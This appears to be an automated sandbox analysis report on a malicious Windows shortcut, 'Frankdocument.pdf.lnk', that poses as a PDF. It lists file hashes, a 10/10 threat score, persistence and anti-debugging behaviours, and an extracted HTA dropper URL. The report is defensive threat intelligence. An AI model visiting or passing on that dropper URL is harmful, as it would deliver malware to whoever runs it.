Overview

overview

10

Static

static

1

Frankdocument.pdf.lnk

windows11-21h2-x64

10

Resubmissions

21/02/2024, 19:40

240221-ydhmtseg59 10

21/02/2024, 19:35

240221-yandxaeb5w 10

Sharing

Copy URL Twitter E-mail

General

  • Target

    Frankdocument.pdf.lnk

  • Size

    2KB

  • Sample

    240221-ydhmtseg59

  • MD5

    7256cec0cc9a83bcfb4b21f6e8fbe331

  • SHA1

    b4309fb1e216685cffe17661708c1118127e1053

  • SHA256

    1ff0b2c5e3eec4f1da8dc0732a8eeca3b7989ee2a77b0f8c06eb6c31d8e4e5e6

  • SHA512

    26f5885d32b76c26243b8ea6590edc383407ac565f186d7a5c733e2b2198dd132eaa0dc84a073f84f6093d3ddad60cd873612d5514c91e3a42f883378d9d0cc3

Score
10/10
persistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://www.pdfexplorerplugin.com/q1

Targets

    • Target

      Frankdocument.pdf.lnk

    • Size

      2KB

    • MD5

      7256cec0cc9a83bcfb4b21f6e8fbe331

    • SHA1

      b4309fb1e216685cffe17661708c1118127e1053

    • SHA256

      1ff0b2c5e3eec4f1da8dc0732a8eeca3b7989ee2a77b0f8c06eb6c31d8e4e5e6

    • SHA512

      26f5885d32b76c26243b8ea6590edc383407ac565f186d7a5c733e2b2198dd132eaa0dc84a073f84f6093d3ddad60cd873612d5514c91e3a42f883378d9d0cc3

    Score
    10/10
    persistence

    • Blocklisted process makes network request

    • Adds Run key to start application

      persistence

    • Suspicious use of NtCreateThreadExHideFromDebugger

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks